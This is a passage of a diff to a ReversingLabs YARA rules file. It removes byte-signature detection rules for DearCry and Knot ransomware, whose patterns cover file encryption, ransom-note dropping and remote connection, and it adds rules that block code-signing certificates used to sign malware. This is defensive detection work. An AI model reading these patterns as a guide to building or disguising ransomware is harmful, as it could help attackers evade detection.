E8 ?? ?? ?? ?? EB - ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 - 5D C3 - } - $remote_connection_p2 = { - 55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ?? - 74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08 - 83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? - ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 - ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ?? - ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF - 75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ?? - ?? 5F 5E 5B 59 5D C2 - } - $remote_connection_p3 = { - 55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 - ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8 - ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? - 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "World Telecom International Inc." and pe.signatures[i].serial=="6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "12664460-19e1-5b73-8299-cfe19dffc0b4" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12800-L12816" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Install Sync" and pe.signatures[i].serial=="6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE { meta: - description = "Yara rule that detects DearCry ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f" - date = "2021-03-12" - modified = "2021-03-12" + id = "b336ff6c-d94e-5715-bb97-6b60cda90911" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12818-L12834" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DearCry" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $drop_ransom_note_p1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? - ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8 - ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? - E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF - 38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84 - C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ?? - ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? - 8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68 - } - $drop_ransom_note_p2 = { - 89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24 - ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ?? - 0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? - 8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B - 4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F - BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50 - ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 - E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57 - } - $find_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 - A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D - ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? - 8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50 - ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A - ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6 - 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9 - 75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ?? - ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8 - } - $find_files_p2 = { - 83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ?? - 0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24 - ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A - 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB - ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B - C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74 - ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ?? - ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ?? - 52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? - E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PK Partnership, OOO" and pe.signatures[i].serial=="0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "229772ae-68a2-566b-bf61-988cb41d7d8f" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12836-L12854" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($drop_ransom_note_p*)) and ( all of ($find_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV Intalev Ukraina" and (pe.signatures[i].serial=="00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures[i].serial=="e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72") and 1464220800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE { meta: - description = "Yara rule that detects Knot ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8" - date = "2021-03-19" - modified = "2021-03-19" + id = "56114e31-2e9b-5d16-8435-708bbb2687cc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12856-L12874" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Knot" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 - FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51 - FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 - ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B - 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 - C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 - } - $encrypt_files_p2 = { - 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF - 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A - ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B - 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A - ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 - ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D - ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ?? - ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 - ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 - FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3 - } - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 - ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75 - } - $find_files_p2 = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83 - BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ?? - ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? - ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? - 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? - 51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? - 8B E5 5D C3 - } - $remote_connection = { - 55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ?? - 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D - ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ?? - ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B - 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 - ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C\\xC3\\x93IR IP LIMITED" and (pe.signatures[i].serial=="00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures[i].serial=="ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01") 